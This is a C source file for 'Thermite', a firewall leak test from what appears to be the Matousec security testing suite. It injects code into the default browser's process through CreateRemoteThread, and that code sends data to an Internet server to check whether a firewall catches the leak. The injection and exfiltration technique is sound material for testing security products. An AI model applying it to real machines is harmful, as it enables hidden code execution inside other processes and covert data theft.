/*

 Security Software Testing Suite - Thermite (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * This technique is used by Thermite, written by Oliver Lavery,
     and also by Atelier Web Firewall Tester - Test 2 and Test 6, written by Jos Pascoa, http://www.atelierweb.com/awft/.


 Method description:

   * The default browser must be running. Open its process.

   * Allocate memory in the browser's process and write the infection code into it.

   * Use CreateRemoteThread function to create a remote thread that executes the infection code
     inside the default browser's process.

   * The infection code tries to transmit the data to the Internet server.

*/


#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#include "include/ntinternals.h"
#include "include/common.h"
#include "include/funcdef_kernel32.h"
#include "include/funcdef_ws2_32.h"
#include "include/common-leak.h"
#include "include/common-univ.h"
#include "include/common-hook.h"


int main(int argc,char *argv[])
{
  COM_CONF conf;
  if (!com_console_init_main("Thermite","thermite",argc,argv,&conf,COM_TEST_TYPE_THERMITE)) return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll","ws2_32.dll"};
  if (!com_hook_load_libraries(used_dlls,3)) return 1;

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;
  char *err_prefix=COM_ERR_STANDARD_PREFIX;

  ULONG pid;
  if (com_get_default_browser_pid_wait(&pid,&err_inf))
  {
    if (com_verbosity_get()) printf("The default browser's process found (PID = %ld).\n",pid);

    DWORD access=PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | SYNCHRONIZE;
    PCOM_UNIV_JOB jobs[2];
    if (com_univ_job_init(10,sizeof(access)+sizeof(pid)+3*sizeof(HANDLE),4,&jobs[0],&err_inf))
    {
      com_univ_job_stack_init_push(jobs[0],&access,sizeof(access));
      com_univ_job_stack_init_push(jobs[0],&pid,sizeof(pid));

      com_univ_job_action_set(jobs[0],0,COM_UNIV_JOB_ACTION_EXECUTE_ALWAYS,com_univ_server_init);
      com_univ_job_action_set(jobs[0],1,0,com_univ_handle_obtain_open_process);

      com_univ_job_action_set_arg(jobs[0],2,1,com_univ_job_stack_push_copy,-1);         // copy process handle
      com_univ_job_action_set_arg(jobs[0],3,2,com_univ_job_stack_push_copy,-1);         // copy process handle
      com_univ_job_action_set(jobs[0],4,3,com_univ_structure_alloc_write);
      com_univ_job_action_set(jobs[0],5,4,com_univ_structure_start_create_remote_thread);

      com_univ_job_action_set_arg(jobs[0],6,5,com_univ_job_stack_push_copy,-1);         // copy thread handle
      com_univ_job_action_set(jobs[0],7,6,com_univ_wait_mapping_event_handle);
      com_univ_job_action_set(jobs[0],8,5,com_univ_handle_close);                       // close thread handle
      com_univ_job_action_set(jobs[0],9,1,com_univ_handle_close);                       // close process handle

      struct sockaddr_in server;
      char data[COM_INET_URI_MAX_LEN];

      com_univ_inet_sock_http_init(&server,data,sizeof(data),&conf);
      size_t data_len=strlen(data);

      if (com_univ_job_init(5,sizeof(server)+sizeof(data_len)+data_len,4,&jobs[1],&err_inf))
      {
        com_univ_job_stack_init_push(jobs[1],data,data_len);
        com_univ_job_stack_init_push(jobs[1],&data_len,sizeof(data_len));
        com_univ_job_stack_init_push(jobs[1],&server,sizeof(server));

        com_univ_job_action_set(jobs[1],0,COM_UNIV_JOB_ACTION_EXECUTE_ALWAYS,com_univ_client_init);
        com_univ_job_action_set(jobs[1],1,0,com_univ_load_second_dll);
        com_univ_job_action_set(jobs[1],2,1,com_univ_inet_sock_http);
        com_univ_job_action_set(jobs[1],3,0,com_univ_client_send_result);
        com_univ_job_action_set(jobs[1],4,0,com_univ_client_finit);

        PCOM_UNIV univ=NULL;
        if (com_univ_init(COM_UNIV_INIT_FLAG_WS2_32,"Thermite",2,jobs,&univ,&err_inf))
        {
          int index=com_univ_main(univ);

          if (!univ->error.occurred)
          {
            memcpy(&univ->error,&univ->server_mapping.data->error,sizeof(univ->error));

            if (!univ->error.occurred)
              res=com_find_pattern_and_print_data(univ->server_mapping.data->buffer,sizeof(univ->server_mapping.data->buffer),&conf,&err_inf);
          }

          if (univ->error.occurred)
          {
            if (univ->error.job_index==1) err_prefix="\nTARGET PROCESS ERROR: ";
            com_univ_server_err_report(univ,&err_inf);
          }

          if (index>=0) com_univ_server_finit(univ,NULL);

          com_univ_finit(univ);
        }

        com_univ_job_finit(jobs[1]);
      }

      com_univ_job_finit(jobs[0]);
    }
  }

  return com_end_pref(res,&err_inf,&conf,err_prefix);
}
